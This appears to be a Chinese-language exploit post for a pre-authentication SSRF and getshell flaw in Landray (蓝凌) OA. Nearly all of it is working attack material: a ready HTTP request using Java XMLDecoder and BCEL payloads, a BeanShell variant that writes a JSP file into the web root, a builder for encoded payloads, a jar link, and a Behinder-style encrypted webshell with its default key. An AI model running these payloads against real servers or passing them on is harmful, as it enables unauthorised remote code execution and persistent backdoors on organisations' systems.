蓝凌OA 前台SSRF+getshell
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: 1.1.1.1:8080
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
Origin: null
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 174
var={"body":{"file":"/sys/search/sys_search_main/sysSearchMain.do?method=editParam"}}&fdParemNames=11&fdParameters=<java><void+class%3d"com.sun.org.apache.bcel.internal.util.ClassLoader"><void+method%3d"loadClass"><string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$85U$ddV$dbF$Q$fe$W$hd$L$R$88$83$f9$L$a1$Jm$gC$A74Mh$nI1$Y$K$Y$93$Gb$C4$a1$b2$bc$b6Ed$c9$95$d6$81$b4$7d$9f$5e$e7F$f4$d4$e7$f4$B$fa$Qy$8d$de$f5tV$e0$80$5d$b7$f59$de$d5$ce$7c$3b$3b$df$cc$ec$ec$l$7f$fd$f6$3b$80$cf$f1$b3$8a1$cc$v$f8RE$H$e6T$7c$85y9$yD$f0H$c5c$3cQ$f15$WU$a4$b0$a4b$Zi$V$xXU$f0$8d$825$V$3d$98$8b$60$5d$c5$G2r$b1$ZAV$ce$5b$w4$3c$95$c3$b7$K$9e$a9$Y$c0$b6$82$j$VC$S$fe$5c$ce9$v$dcU$f0B$c1$kC$d7$82i$9b$e21C$u1$91c$I$_9$F$ce$d0$9b1m$9e$adU$f2$dc$dd$d1$f3$WIb$Z$c7$d0$ad$9c$ee$9ar$7d$$$M$8b$b2$e9I$dd$8a$ee$89u$cf$b1$d3F$d9I$z$a53$f3$Mj$fa$c4$e0Ua$3a6$n$c2$V$dd$b4$Z$G$S$H$99$p$fd$8d$9e$b4t$bb$94$dc$W$aei$97$e6$83cu$b7D$b0km$d4$M$91$F$c3j8iX$E$bbz$J$b5d$e9$9eG$a0pU$Xe$e9J$h$D$ac$c8p$e5La$3a$c9$V$d3$e2rC$d1$a9$J$86$91$s$f9VMTk$826r$bdB$98$9em$a1$h$af7$f5j$c0$97BF$b4$b6$9d$9akp$Jf$88$b7$f2$9e$91$c64$7c$84$9b$M$7d$adJ$F$fb$g$O$f0$9d$86$97xE1$ce$7b$e5$995$5bp$b7$ear$g$V$ij$f8$k$ba$82$bc$G$D$F$F$5cC$R$r$Fe$N$s$8e$U$bc$d6$60$a1$c2$a0$5dv$99a$b0$95r$aafZ$F$ee2$u$bb$e9$d4$f4ZvE$81$ad$c1AU$c3$P$mq$yi9$r$d3$3e$dc$a4$a4$bc$b87$3bs$e4$91$c6CE$3a$$4$d4$f0$86a$e8$df$c2$oA$c7$94J$aff$t$x$a6g$qS$8b$db$e9$H$f7$97$b9$e1$EgF$f4$d5$9c$97_$9d$7b$a4$e1$Eo5$fc$88$9f$u$b1$X$$$7e$u$L$8a$d0$85t$x$7f$c4$N$d1$q$da$v$d3q$FJ$82Qs$5dn$8b$c6$ba$3f1$91iEQ$ae$e2$r$$$96$i$K$e7$89$Ij$o$e3$e8$81$3f$c3M$f0K$w$b9$a7$ad$82$nj$d1G$ma$b8$9dhS$b2m$K$b0$b7ED$a4$c9$a3$a7$ae$p$88$Y$d1$5dv$ce$ee$c0x$c3$l$8f$T1S$bcM$b6b$c8$d8$d8$7f$p$u$u$B$db$C$3f$abF$86$d1$7fX$bd$d0$ce7$b2$d9F$c7$d0M$96$e4$dd$3eOI$c3$8e$cdE$f2$f93y$91$b5$cbk$aa$v$c9$w$b8k$cd$89$f8p$db$faZe$M$9d$5e$d52$v$bbw$da$c5$b2$ed$9d$ef$d2$abUnS$b6$a7$ff$t$fcM$V$_$9b$85p$g$a7$c6$dbm$cd$c9$82$a2$92$R$3c$cb$8f$cf$ee$Pu$be$7dj$w$89$e6$O$n$91Z$n$a8$eaT$adX$94e1$d0$d6$fd$U$f1$3b$a6$b0$92$a5$ce$c4Aj$o$87$5b$d4$cd$c7$m$7f$n0$d9$Mh$7d$xh$f8$d4$8bh$ee$9c$3c$F$7bG$l$j$Y$a7Q6$7f$a0$haj$da$l$d3$97v$G$c2$t$b8M$f3$a7$f4$P$93$e4$G$a2$b8$83$c4$b9$a9$874KT$b4$8e$8e$bdS$84v$5b$cd$f5$o$82$beK$e6$a2$98$c0d$93$b9$I$ee$92g$y0$f7$9e$8e$L$d3$7c$f8$x$c2$3e$3ac$5d$3e$94$8dI$l$R$lQ$l$aa$8f$eeL$j$da$5e$j$3dt$d8$95$bb$b1$5e$l$7d$a1Y$lWc1$g$7c$5c$3bE$ff$e6$94$8f$f8n$j$D$7bS$a7$Y$ccN$d71D$e0$e1$d8$88$8f$eb$3eF$7fAx$e3$5d$e0$ca$3e$f5$bf$h$U$9a$f1$c0$9d$u$8d$fd$e4d$i$p$f4$$$z$60$Q$8b$f4H$adc$98p$a3$84$bc$8eW$ULId2$88P$WS$98$a6$d5$I$bd$8d3H$92$c5$F$d2$7f$86$7bD$7b$9d$u$cfR$98C$b8$lP$ee$f8$T$_$V$7c$B$C$3d$I$e2$f3$f0o$b7e$Ge$7b$H$A$A</string><void+method%3d"newInstance"></void></void></void></java>
var={"body":{"file":"/sys/search/sys_search_main/sysSearchMain.do?method=editParam"}}&fdParemNames=11&fdParameters=<java><void class="bsh.Interpreter"><void method="eval"><string>
import java.io.PrintWriter;
import sun.misc.BASE64Decoder;
Class cls=Thread.currentThread().getContextClassLoader().loadClass("bsh.Interpreter");
String path=cls.getProtectionDomain().getCodeSource().getLocation().getPath();
PrintWriter printWriter2 = new PrintWriter(path.split("WEB-INF")[0] + "login_MainX12.jsp");
String shell = "PCVvdXQucHJpbnRsbigiMTExMTExMTExMTEiKTslPg==";
BASE64Decoder decoder = new BASE64Decoder();
String decodeString = new String(decoder.decodeBuffer(shell), "UTF-8");
printWriter2.println(decodeString);
printWriter2.close();
</string>
</void></void></java>
生成becl 代码
import org.apache.bcel.Repository;
import org.apache.bcel.classfile.JavaClass;
import org.apache.bcel.classfile.Utility;
import java.io.IOException;
public class becl {
public static void main(String[] args) throws ClassNotFoundException, IOException {
JavaClass javaClass = Repository.lookupClass(FastJsonEchoBCEL.class);
String codes = Utility.encode(javaClass.getBytes(), true);
System.out.println("$$BCEL$$"+codes);
}
}
FastJsonEchoBCEL.java
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//
import java.io.PrintWriter;
import sun.misc.BASE64Decoder;
public class FastJsonEchoBCEL {
public FastJsonEchoBCEL() throws Exception {
}
public static void main(String[] args) throws Exception {
new FastJsonEchoBCEL();
}
static {
try {
Class cls=Thread.currentThread().getContextClassLoader().loadClass("bsh.Interpreter");
String path=cls.getProtectionDomain().getCodeSource().getLocation().getPath();
PrintWriter printWriter2 = new PrintWriter(path.split("WEB-INF")[0] + "login_MainX146.jsp");
String shell = "PCVvdXQucHJpbnRsbigiMTExIik7JT4=";
BASE64Decoder decoder = new BASE64Decoder();
String decodeString = new String(decoder.decodeBuffer(shell), "UTF-8");
printWriter2.println(decodeString);
printWriter2.close();
} catch (Exception var5) {
}
}
}
jar 如下:
https://www.o2oxy.cn/wp-content/uploads/2021/05/1.zip
只能通过JDK7去编译。这里编译好了一个冰xie的马
<%@page import=”java.util.*,javax.crypto.*,javax.crypto.spec.*”%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(“POST”)){String k=”e45e329feb5d925b”;/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue(“u”,k);Cipher c=Cipher.getInstance(“AES”);c.init(2,new SecretKeySpec(k.getBytes(),”AES”));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$85Vk$5b$db$d8$R$k$F$T$h$c7$d9$ecBH$c2$s$dd$edn$bb$5d$SB0$c6$97$90$90M$b1$b1$8dlY$60lK$b2$d26$d5$NK$b6n$e8$e2$mz$f9$3b$fd$bc_$9c$3e$e5y$fa$D$fa$87$fa$adO$e7$c8$90$F$ea$b6$e6$f1$b9$cc$ccy$cf$cc$3bx$e6$fc$e3_$7f$fb$3b$Al$c1$9f$d3$f05$bcI$c2$Pi$b8$Fo$d2$f0$W$7eM$86$dd$U$94$d3P$81$bd4T$a1$96$86$3a$ec$a7$81$86F$g$9a$c0$q$a1$95$E6$Nw$e1M$K$O$d2$f0$I$O$c9$a6$9d$82$p2w$d2$90$81n$KzI$e0$d2$f0$80$a0$f3d$WR$d0$t$c6$o$d1$bf$p$c3o$92$f0$db$q$fc$8e$82$db$3b$86m$E$3fP0$b7$fa$94$a3$mQqT$8d$82$7b$8caklh$c9$9a$d7$95d$T$r$8b$8c$a3H$s$ty$G$d9_$I$T$81n$f8DW$93$fc$a0$e1$3bvU$d1$9dr$a5$ca$bc$a6$m$5d$3dU470$i$h$z$S$96d$d8$U$3cX$7d$c7$M$a5$b1$b4aJ$f6$60$a3$Tx$86$3dx$j_$xy$D4$5b$9a$a1$a6$m$b5$a3$98$97N$w$s$9a$7dq$c5$aabJ$be$8fF$JW$Kt$e2$ca$M$80$8c$8b$8b$80$f7$8c$40$f3r$U$yOm$Mg$e3$f0$t9$9a$cd$fb$baf$9a$U$qUMA$W$3c$K$k1$7ehoX$86$afl$94w$3b$d5b$7eo$aa$n$98S$a3$e9$jx$fdX$f2$K$9f$a0$e3$eb$3f$c5$8f$d6w$3b$81$a4$8cZ$92$h$T$87$dc$p$3f$j$t$f4$U$adf$Q$o$97o$S$f8$82$e0d$e0$e7$f0$N$F$9f$dfT$s$e1$7d$G$7e$P$a8$97A$c1d$c9$be$fe$82$b61$I$d7$d3pL$82$9a$B$N$8e$930$c8$80$OF$S$86$Z$Y$81$99$E$x$D68Ip3p$C$Y$df$d2$M$o$uxx$93$c2rh$981$lI$beZ$5e$a7$d9Z$G$7c$I2$Q$c2$Y$Z7$9d$81a$bfoa$82$85$cd$7c$f1$c5$d0G$f4$P$e0$R$e7O$a9$b9$7c$de$a90$87$VnW$a9$d7l$b1Sve$a1$3cV$ec$f66m$b9$bajUCU8r$e5J$fe$84$a9$93$7d$z$cfXl$a4$J$e5$ac$i$cd$92$V$ce$94$3a7d$M$c7ht$f3$_$h$9d$daP$ae$d7$ce$94$a8$cc$d1u$$$af$d6$b9P$dco$N$da$b9S$5d$d9b$5br$ae6$S$85F$89$eb$e8$7b$b1$5d$f6t$dc$e7$8fL$c5$u$P$9bBp$a6$Ke$5c$eb$c3f7$d8V$f69C$ae$9bC$ba$ca$fa$7d$81$3d$a3$eb$8a$d3$b7$cd$y$fa$y$L$3c$edj$5b$NS$dd$e7$o$d9$u_$9c$x$8cD$5ete$8b$9bbG$ba$c1$ec$ed$fa$7d$a3$e0$8b$7c$c1V$eb$D$f7$60ks$3b$f6$937$z$ba$a2G$a2P$db$U$F6$cbX$aa$a9V7M$b5$ae$8f$c5$ca$c0e$y$eeT$e5k$be$S$N$8c$5eu$bb$cbUh$X$fd$eb$aa$fb$N$c4W$G$d2Y$d6$Q$bb$edM$b1$db$8a$Ox$d1$ec$P$b9$d1A$97$de$ec$ht$89$89$3c$c7$x$K$a6$97$97$dd$d1$890$K$Z$cf$Z$XJ$d6$f0$q$96$d9$O$5d$3dk$85$9d$ed$n$bf9b5$7ew$7c$a0I$fa$B$df$Yv$ab$b9$C$93cK$a5$a8U$94$c3$7e$b1Y$i$V$995$ad$e0$U$cd$82$b4V$_$U$xe$c5$e2$MQ0$c7$b2$d5$3ea$b6X$T9u$e5$5c$3eD$ae$b2$9cU$f3U$be$e7$d0v$cf$60$ea$be$7b$90e$5d$a5$ae$c7$dc$k$f6$$$d7$F$5b$U$8e$g$b2$cdf$fb$7ca$uv$GF$bb$c7uicT$eaG$F$8c$cd$cc6$f7h$l9$dc$a2k$ac$d9$t$iW$DS$e3$d8$P$o$dfr$a4$u$3e_$d1$E$ccY$84$3cU$g$e5$p$aee4$3b$a3$d2$f4L$cfA$O$5dejw$91$H$c2$t$e1w$9a$c7n$7d$5b$X$eb$5c$d4$ac$8cP$8e9$8d$K$p9K$f2V$f3$9b$f5$82$a9F$98O$3e$l$ca$bcy$86$baJ$9bck$ec$f0$a8$w$f2$ec$f8$e2$5c$88$f3P$ce$j$99m$9b$b3D$Le$fb$NS$R8$e4$a3$j$8a9$$$db$b3$b8$cb$3bB$85$ac$ab$a7$88$dfs$d0O$b7$d9$v$84$a2$a0$5e$e5$e0J$be$f5$P$7d$5e5$db$b9$edP$r$ff$bf$95Q$e9$b8$d3$5b$c3J9$bb$f0$601$b8$f9$e3$cc$40$EgX$bcz$dd$da$faK$f2$a3$fbC$G$fe$I$a7$Z$f8$T$a9$jK3$ea$d15$90$Dy$a8$v$c15QW$f74I$c5$a2$a5$84$9e$a7$d9$c1$e5$fe$fe$eaS$e6$a6$V$d6$b6$e5$81$WT$i$y$3f$a7A$5c$8c$ZG$8a$3d$5d$b9f$7eEE$ce$ccTP$b0$60$e2$o$96P$f0$dd$ea$8c$5e1$a3$f2$df$bb$n$c2$a0$d1$a3C$cf$J00$Mw$cf$996$9fo$_$fd$f15$M$cc$I$a2$8d$9b6$I$f6$d5$ff$b6$40R$e2h$b1$f0$c7$d5$9b$82$t$ff$81$fa$93$W$f1$k$fd7$j$Fw$Q$894$d5$8b$94$5c$e2$d8Z$b0$d1$3b$o$j4su$8f$c5$97D$V7$b9$eb$89$f8$d4$e6$e6$7d$d740$95$df$cf$onfg$bd$z$b9$aefcj$d7$ff$P$d7$d7$fa$Ai$c9$81s$d9$f9$96g$j$e5$3e5$c8rx$7cL2$fb$60$a6Se$ec6$ab$ef$ca$b3$R$92q$db6$91$9cy$c5t$7c$N$be$c1$87$d2$d7$40$3es$40$91$de$88$fbo$e3$b7$U$85$7f$A$f3$cf$3e$C$f5$p$$n$c1$_p$q$ef$w2$s$e0$O$fc$SW$99$a9$R$7c$H$bf$c2$f9$7b$fc$sP$f2$V$y$c0$w$3c$bd$80$w$e1L$ac$W$ce$e1V$ff$p$cc$f17$e1$3e$83$U$dc$bb$C$b7$A$cf$60$ed$g$5c$K$9e$a3g$U$81$a3$ee$e2u$b7Q$a3$ff$V$S$T$98_$bc$3d$81d$f3$d9$ER$TX$98$40z$Cw$98s$c8$f4$cf$e1$$$5e$f6$d9$da$e2$bd$J$7c$3e$97$9b$c0$X$8b$8b8L$60$e9$p$dco$z$$$b3$e7$f0$A$N$k$beJ$9c$c3$a3$feJb$7d$C$x$8b_$7e$84$c7$af$e6$9f$af$ccO$e0$c9$f3$J$fc$ec$_$90h$fe$Y$fb$a4$c01$fa1$X$7b$fd$C$83$HXBo$ef$c3$97$b0$M$3b$f8$i$7c$L$Pa$l$9f$83$7dX$81$f7$uU$e0$J$9ex$M$D$3cE$o$db$87$q$da$f3$b0$8e$a7$B$f54l$40$W$91w0$caM$c8$n$Po$d1n$Lesh$fb$Y$f2P$c0$d8$fb$c8P$Re$f3$88C$88$7c$89$e3v$cc$d0$ad$7f$92$c7$c8$x$e4$D$5e$c7t$ee$fc$h$V$81v$a7$F$L$A$A
